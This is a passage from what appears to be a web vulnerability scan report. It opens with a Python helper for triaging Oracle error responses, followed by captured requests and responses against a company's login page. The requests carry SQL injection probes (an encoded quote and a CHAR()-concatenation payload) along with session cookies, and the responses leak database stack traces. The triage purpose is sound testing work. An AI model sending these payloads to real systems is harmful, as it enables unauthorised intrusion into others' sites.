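    while unquote(layers[-1]) != layers[-1]:
        layers.append(unquote(layers[-1]))
    return layers


def oracle_codes(response_text):
    """Distinct ORA- codes in order of appearance ('toolkitORA-06512' still matches)."""
    seen = []
    for code in re.findall(r"ORA-\d{5}", response_text):
        if code not in seen:
            seen.append(code)
    return seen


def block_aligned(value):
    """True when the value's UTF-8 length is a whole number of DES blocks."""
    return len(value.encode("utf-8")) % DES_BLOCK_BYTES == 0


def control_values(probe):
    """Metacharacter-free controls: one of the probe's length, one block-aligned."""
    n = len(probe)
    aligned = n if block_aligned(probe) else n + (DES_BLOCK_BYTES - n % DES_BLOCK_BYTES)
    return ["a" * n, "a" * aligned]


def verdict(probe, probe_response, control, control_response):
    """Compare the quote probe with a same-length control that has no metacharacters."""
    if len(probe) != len(control):
        raise ValueError("control must match the probe's length")
    p, c = oracle_codes(probe_response), oracle_codes(control_response)
    if not p:
        return "no-oracle-error"
    if p == c:
        if "ORA-28232" in p and not block_aligned(control):
            return "input-length-error: control reproduces it, not injection evidence"
        return "same-error-for-control: not specific to the metacharacter"
    return "metachar-specific-error: investigate as possible injection"


if __name__ == "__main__":
    print(decode_layers("%2527"))  # the request value, layer by layer
    print(oracle_codes(ORA_28232_RESPONSE))
    print(control_values("'"), control_values("Ronald Smith"))
    print(verdict("'", ORA_28232_RESPONSE, "a", ORA_28232_RESPONSE))
    print(verdict("'", ORA_28232_RESPONSE, "a", CLEAN_RESPONSE))
```

Note that `Ronald Smith` in the third request is 12 bytes, also not block-aligned, so both captured probes are consistent with the length explanation; only a same-length control that comes back clean would point at the quote itself.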
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=..

Parameters

Parameter Type Value
fromPage GET index
username GET Ronald Smith
password GET %27
GET 3
_flowId GET loginact-flow

Request

GET /spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=%2527&=3&_flowId=loginact-flow HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:59:37 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6186

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>
<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). 
--- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="2FF790FDB315C80023FC621E3266E6C1.app7-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >
<!-- Header Start -->
<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>
<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map[&#039;method&#039; -&gt; &#039;setupForm&#039;]] in state &#039;enterCriteria&#039; of flow &#039;loginact-flow&#039; -- action execution attributes were &#039;map[&#039;method&#039; -&gt; &#039;setupForm&#039;]&#039;; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [72000]; error code [1465]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-01465: invalid hex number; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-01465: invalid hex number
</div>

</div>
</div>
<div >
<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >




<div id="sitemap">

<div class="block first">


<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Pre..
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=..

Request

GET /spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=3&=%2527&_flowId=loginact-flow HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:59:49 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6211






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>
<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/indexLogin.do";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). 
--- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="2FF790FDB315C80023FC621E3266E6C1.app7-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map[&#039;method&#039; -&gt; &#039;setupForm&#039;]] in state &#039;enterCriteria&#039; of flow &#039;loginact-flow&#039; -- action execution attributes were &#039;map[&#039;method&#039; -&gt; &#039;setupForm&#039;]&#039;; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT_FFI&#034;, line 40ORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT&#034;, line 138ORA-06512: at &#034;PSMGR.DECRYPT_FUNCTION&#034;, line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT_FFI&#034;, line 40ORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT&#034;, line 138ORA-06512: at &#034;PSMGR.DECRYPT_FUNCTION&#034;, line 8
</div>

</div>
</div>
<div >
<!-- Footer Start -->
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownT..
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=..

Parameters

Parameter  Type  Value
fromPage   GET   index
username   GET   Ronald Smith
password   GET   3
           GET   3
_flowId    GET   'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

Request

GET /spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=3&=3&_flowId='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=EF46B22FE38C1DFD3796C73A1E51B52E.app5-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 12:00:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6550






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>
<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@2463c5dd targetAction = com.idearc.ssa.web.spring.LoginActAction@18c32a5d, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). 
--- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="EF46B22FE38C1DFD3796C73A1E51B52E.app5-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
